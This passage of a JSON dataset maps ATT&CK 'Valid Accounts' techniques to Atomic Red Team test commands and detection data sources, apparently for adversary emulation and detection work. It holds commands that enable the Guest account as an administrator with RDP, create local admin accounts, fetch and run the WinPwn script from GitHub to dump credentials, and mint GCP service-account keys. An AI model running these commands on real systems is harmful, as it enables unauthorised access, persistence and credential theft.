This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + 
}, + { + "technique_id": "T1078.001", + "command_list": [ + "net user guest /active:yes\nnet user guest #{guest_password}\nnet localgroup #{local_admin_group} guest /add\nnet localgroup \"#{remote_desktop_users_group_name}\" guest /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "net user #{guest_user} /active:yes\nnet user #{guest_user} Password123!\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup Administrators #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"Remote Desktop Users\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + null, + "net user guest /active:yes\n" + ], + "commands": [ + { + "command": "net user guest /active:yes\nnet user guest #{guest_password}\nnet localgroup #{local_admin_group} guest /add\nnet localgroup 
\"#{remote_desktop_users_group_name}\" guest /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": "net user #{guest_user} /active:yes\nnet user #{guest_user} Password123!\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup Administrators #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"Remote Desktop Users\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 
0x1 /f", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": null, + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": "net user guest /active:yes\n", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1078.001", + "display_name": "Valid Accounts: Default Accounts", + "atomic_tests": [ + { + "name": "Enable Guest account with RDP capability and admin privileges", + "auto_generated_guid": "99747561-ed8d-47f2-9c91-1e5fde1ed6e0", + "description": "After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,\nand desktop will allow multiple RDP connections.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "guest_user": { + "description": "Specify the guest account", + "type": "String", + "default": "guest" + }, + "guest_password": { + "description": "Specify the guest password", + "type": "String", + "default": "Password123!" 
+ }, + "local_admin_group": { + "description": "Specify the admin localgroup name", + "type": "String", + "default": "Administrators" + }, + "remote_desktop_users_group_name": { + "description": "Specify the remote desktop users group name", + "type": "String", + "default": "Remote Desktop Users" + }, + "remove_rdp_access_during_cleanup": { + "description": "Set to 1 if you want the cleanup to remove RDP access to machine", + "type": "Integer", + "default": 0 + } + }, + "executor": { + "command": "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "cleanup_command": "net user #{guest_user} /active:no >nul 2>&1\nnet localgroup #{local_admin_group} #{guest_user} /delete >nul 2>&1\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /delete >nul 2>&1\nif #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)\nif #{remove_rdp_access_during_cleanup} EQU 1 (reg delete \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /f >nul 2>&1)\nif #{remove_rdp_access_during_cleanup} EQU 1 (reg delete \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /f >nul 2>&1)", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Activate Guest Account", + "auto_generated_guid": "aa6cb8c4-b582-4f8e-b677-37733914abda", + "description": "The Adversaries can activate the default Guest user. 
The guest account is inactivated by default\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "guest_user": { + "description": "Specify the guest account", + "type": "String", + "default": "guest" + } + }, + "executor": { + "command": "net user #{guest_user} /active:yes\n", + "cleanup_command": "net user #{guest_user} /active:no\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon 
session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1078.003", + "command_list": [ + "net user art-test /add\nnet user art-test Password123!\nnet localgroup administrators art-test /add", + "dscl . -create /Users/AtomicUser\ndscl . -create /Users/AtomicUser UserShell /bin/bash\ndscl . -create /Users/AtomicUser RealName \"Atomic User\"\ndscl . -create /Users/AtomicUser UniqueID 503\ndscl . 
-create /Users/AtomicUser PrimaryGroupID 503\ndscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser\ndscl . -passwd /Users/AtomicUser mySecretPassword\ndscl . -append /Groups/admin GroupMembership AtomicUser", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nobfuskittiedump -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsafedump -consoleoutput -noninteractive" + ], + "commands": [ + { + "command": "net user art-test /add\nnet user art-test Password123!\nnet localgroup administrators art-test /add", + "source": "atomics/T1078.003/T1078.003.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Local Accounts" + }, + { + "command": "dscl . -create /Users/AtomicUser\ndscl . -create /Users/AtomicUser UserShell /bin/bash\ndscl . -create /Users/AtomicUser RealName \"Atomic User\"\ndscl . -create /Users/AtomicUser UniqueID 503\ndscl . -create /Users/AtomicUser PrimaryGroupID 503\ndscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser\ndscl . -passwd /Users/AtomicUser mySecretPassword\ndscl . 
-append /Groups/admin GroupMembership AtomicUser", + "source": "atomics/T1078.003/T1078.003.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Local Accounts" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nobfuskittiedump -consoleoutput -noninteractive", + "source": "atomics/T1078.003/T1078.003.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Local Accounts" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsafedump -consoleoutput -noninteractive", + "source": "atomics/T1078.003/T1078.003.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Local Accounts" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1078.003", + "display_name": "Valid Accounts: Local Accounts", + "atomic_tests": [ + { + "name": "Create local account with admin privileges", + "auto_generated_guid": "a524ce99-86de-4db6-b4f9-e08f35a47a15", + "description": "After execution the new account will be active and added to the Administrators group", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user art-test /add\nnet user art-test Password123!\nnet localgroup administrators art-test /add", + "cleanup_command": "net localgroup administrators art-test /delete >nul 2>&1\nnet user art-test /delete >nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Create local account with admin privileges - MacOS", + "auto_generated_guid": "f1275566-1c26-4b66-83e3-7f9f7f964daa", + "description": "After execution the new account will be active and added to the Administrators group", + "supported_platforms": [ + "macos" + 
], + "executor": { + "command": "dscl . -create /Users/AtomicUser\ndscl . -create /Users/AtomicUser UserShell /bin/bash\ndscl . -create /Users/AtomicUser RealName \"Atomic User\"\ndscl . -create /Users/AtomicUser UniqueID 503\ndscl . -create /Users/AtomicUser PrimaryGroupID 503\ndscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser\ndscl . -passwd /Users/AtomicUser mySecretPassword\ndscl . -append /Groups/admin GroupMembership AtomicUser", + "cleanup_command": "sudo dscl . -delete /Users/AtomicUser", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "WinPwn - Loot local Credentials - powerhell kittie", + "auto_generated_guid": "9e9fd066-453d-442f-88c1-ad7911d32912", + "description": "Loot local Credentials - powerhell kittie technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nobfuskittiedump -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - Loot local Credentials - Safetykatz", + "auto_generated_guid": "e9fdb899-a980-4ba4-934b-486ad22e22f4", + "description": "Loot local Credentials - Safetykatz technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsafedump -consoleoutput -noninteractive", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network 
environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information 
about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1078.004", + "command_list": [ + "gcloud auth login --no-launch-browser\ngcloud config set project art-project-1\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create gcp-art-service-account-1\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com\n", + "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create gcp-art-service-account-1.json --iam-account=#{service-account-email}\n" + ], + "commands": 
[ + { + "command": "gcloud auth login --no-launch-browser\ngcloud config set project art-project-1\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "source": "atomics/T1078.004/T1078.004.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Cloud Accounts" + }, + { + "command": "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create gcp-art-service-account-1\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "source": "atomics/T1078.004/T1078.004.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Cloud Accounts" + }, + { + "command": "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com\n", + "source": "atomics/T1078.004/T1078.004.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Cloud Accounts" + }, + { + "command": "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create gcp-art-service-account-1.json --iam-account=#{service-account-email}\n", + "source": "atomics/T1078.004/T1078.004.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Cloud Accounts" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1078.004", + "display_name": "Valid Accounts: Cloud Accounts", + "atomic_tests": [ + { + "name": "Creating GCP Service Account and Service Account Key", + "auto_generated_guid": "9fdd83fd-bd53-46e5-a716-9dec89c8ae8e", + "description": "GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud.\n", + "supported_platforms": 
[ + "google-workspace", + "windows", + "linux", + "macos" + ], + "input_arguments": { + "project-id": { + "description": "ID of the project, you want to create service account as well as service account key for", + "type": "String", + "default": "art-project-1" + }, + "service-account-name": { + "description": "Name of the service account", + "type": "String", + "default": "gcp-art-service-account-1" + }, + "service-account-email": { + "description": "Email of the service account", + "type": "String", + "default": "gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com" + }, + "output-key-file": { + "description": "Email of the service account", + "type": "String", + "default": "gcp-art-service-account-1.json" + } + }, + "executor": { + "name": "gcloud", + "elevation_required": false, + "command": "gcloud auth login --no-launch-browser\ngcloud config set project #{project-id}\ngcloud iam service-accounts create #{service-account-name}\ngcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}\n", + "cleanup_command": "gcloud iam service-accounts delete #{service-account-email} --quiet\n" + }, + "dependency_executor_name": "gcloud", + "dependencies": [ + { + "description": "Requires gcloud\n", + "prereq_command": "if [ -x \"$(command -v gcloud)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install\"\n" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
